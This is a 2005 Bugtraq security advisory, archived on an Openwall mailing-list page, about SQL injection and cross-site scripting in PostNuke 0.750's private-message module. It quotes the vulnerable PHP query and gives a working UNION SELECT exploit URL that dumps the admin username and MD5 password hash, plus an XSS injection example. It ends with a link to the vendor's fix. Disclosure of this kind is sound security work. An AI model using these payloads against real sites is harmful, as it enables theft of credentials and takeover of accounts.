lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050527223753.21735.qmail@www.securityfocus.com>
Date: 27 May 2005 22:37:53 -0000
From: sp3x <sp3x@...urityreason.com>
To: bugtraq@...urityfocus.com
Subject: PostNuke Critical SQL Injection and XSS 0.750=>x




-=[ Critical SQL injection and XSS in PostNuke ]=-

Author: sp3x
Date: 27. May 2005

Affected software :
===================
PostNuke version : x=> 0.750

Description :
=============
PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/

Vulnerabilities :
*****************

Critical SQL injection :
========================

Code :
------

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
					$column[msg_image] AS \"msg_image\",
					$column[subject] AS \"subject\",
					$column[from_userid] AS \"from_userid\",
					$column[to_userid] AS \"to_userid\",
					$column[msg_time] AS \"msg_time\",
					$column[msg_text] AS \"msg_text\",
					$column[read_msg] AS \"read_msg\"
			FROM $pntable[priv_msgs]
            WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";

    $resultID =& $dbconn->SelectLimit($sql,1,$start);
    if($dbconn->ErrorNo()<>0) {
        error_log("DB Error: " . $dbconn->ErrorMsg());
        echo $dbconn->ErrorMsg() . "<br />";
        forumerror(0005);
    }
=======================

First lets login -in as user in postnuke. Then send the message to yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1

Note :
------
total_messages=1 - the id of total_messages must exist

Now you will see this error message 

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL injection],1' at line 10
========================

Exploit SQL injection :
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

And we can see the admin md5 password and nick :)

Cross-site scripting - XSS :
============================

Thanks to error message we can also perform XSS attacks :)

Example :
---------

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

And we get :

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10
========================

How to fix :
============

PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

Greets :
========

cXIb8O3 and pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ